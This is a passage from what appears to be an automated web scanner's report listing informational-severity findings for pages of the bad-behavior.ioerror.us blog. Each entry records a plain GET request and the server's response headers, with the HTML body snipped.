Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762109+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 39196

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.162. http://bad-behavior.ioerror.us/2009/12/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /2009/12/

Request

GET /2009/12/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762105+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 45419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.163. http://bad-behavior.ioerror.us/2010/02/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /2010/02/

Request

GET /2010/02/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762105+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 15728

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.164. http://bad-behavior.ioerror.us/2010/07/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /2010/07/

Request

GET /2010/07/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762104+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 22109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.165. http://bad-behavior.ioerror.us/2010/08/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /2010/08/

Request

GET /2010/08/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:14:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762094+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 19872

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.166. http://bad-behavior.ioerror.us/2011/01/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /2011/01/

Request

GET /2011/01/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:12:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761951+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 32053

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.167. http://bad-behavior.ioerror.us/2011/01/05/bad-behavior-2-1-8/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /2011/01/05/bad-behavior-2-1-8/

Request

GET /2011/01/05/bad-behavior-2-1-8/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:12:29 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761949+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Link: <http://bad-behavior.ioerror.us/?p=441>; rel=shortlink
Content-Length: 26787

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.168. http://bad-behavior.ioerror.us/2011/01/25/bad-behavior-2-0-40/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /2011/01/25/bad-behavior-2-0-40/

Request

GET /2011/01/25/bad-behavior-2-0-40/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:12:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761938+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Link: <http://bad-behavior.ioerror.us/?p=1109>; rel=shortlink
Content-Length: 15936

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.169. http://bad-behavior.ioerror.us/2011/01/25/bad-behavior-2-1-9/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /2011/01/25/bad-behavior-2-1-9/

Request

GET /2011/01/25/bad-behavior-2-1-9/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:12:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761929+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Link: <http://bad-behavior.ioerror.us/?p=1117>; rel=shortlink
Content-Length: 19047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.170. http://bad-behavior.ioerror.us/2011/01/27/bad-behavior-2-0-41-and-2-1-10/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /2011/01/27/bad-behavior-2-0-41-and-2-1-10/

Request

GET /2011/01/27/bad-behavior-2-0-41-and-2-1-10/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:12:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761927+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Link: <http://bad-behavior.ioerror.us/?p=1131>; rel=shortlink
Content-Length: 22629

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.171. http://bad-behavior.ioerror.us/2011/02/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /2011/02/

Request

GET /2011/02/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:12:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761926+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 14422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.172. http://bad-behavior.ioerror.us/2011/02/15/bad-behavior-2-0-42-and-2-1-11/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /2011/02/15/bad-behavior-2-0-42-and-2-1-11/

Request

GET /2011/02/15/bad-behavior-2-0-42-and-2-1-11/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:12:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761920+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Link: <http://bad-behavior.ioerror.us/?p=1137>; rel=shortlink
Content-Length: 17864

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.173. http://bad-behavior.ioerror.us/blog/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /blog/

Request

GET /blog/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:11:38 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761897+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 72722

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.174. http://bad-behavior.ioerror.us/category/akismet/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /category/akismet/

Request

GET /category/akismet/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:12:37 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761955+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 29629

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.175. http://bad-behavior.ioerror.us/category/bad-behavior/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /category/bad-behavior/

Request

GET /category/bad-behavior/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:12:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761972+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 51666

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.176. http://bad-behavior.ioerror.us/category/blog-spam/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /category/blog-spam/

Request

GET /category/blog-spam/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:12:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761976+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 59636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.177. http://bad-behavior.ioerror.us/category/blogging/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /category/blogging/

Request

GET /category/blogging/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:13:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761984+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 22596

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.178. http://bad-behavior.ioerror.us/category/coppermine-photo-gallery/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /category/coppermine-photo-gallery/

Request

GET /category/coppermine-photo-gallery/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:13:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761984+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 15954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.179. http://bad-behavior.ioerror.us/category/cyveillance/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /category/cyveillance/

Request

GET /category/cyveillance/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:13:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761984+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 12753

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.180. http://bad-behavior.ioerror.us/category/drupal/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /category/drupal/

Request

GET /category/drupal/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:13:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761987+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 43170

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.181. http://bad-behavior.ioerror.us/category/expressionengine/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /category/expressionengine/

Request

GET /category/expressionengine/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:13:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761990+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 65218

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.182. http://bad-behavior.ioerror.us/category/firefox/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /category/firefox/

Request

GET /category/firefox/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:13:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761991+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 12683

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.183. http://bad-behavior.ioerror.us/category/godaddy/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /category/godaddy/

Request

GET /category/godaddy/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:13:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761994+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 13400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.184. http://bad-behavior.ioerror.us/category/google/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /category/google/

Request

GET /category/google/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:13:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761998+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 17460

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.185. http://bad-behavior.ioerror.us/category/internet-explorer/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /category/internet-explorer/

Request

GET /category/internet-explorer/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:13:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762025+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 12733

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.186. http://bad-behavior.ioerror.us/category/internet/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /category/internet/

Request

GET /category/internet/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:13:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762014+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 41907

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.187. http://bad-behavior.ioerror.us/category/joomla/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bad-behavior.ioerror.us
Path:   /category/joomla/

Request

GET /category/joomla/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:14:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762040+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 36968

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...

7.188. http://bad-behavior.ioerror.us/category/lifetype/  previous  next

Summary

Severity:   Information
Confidence:   Certain
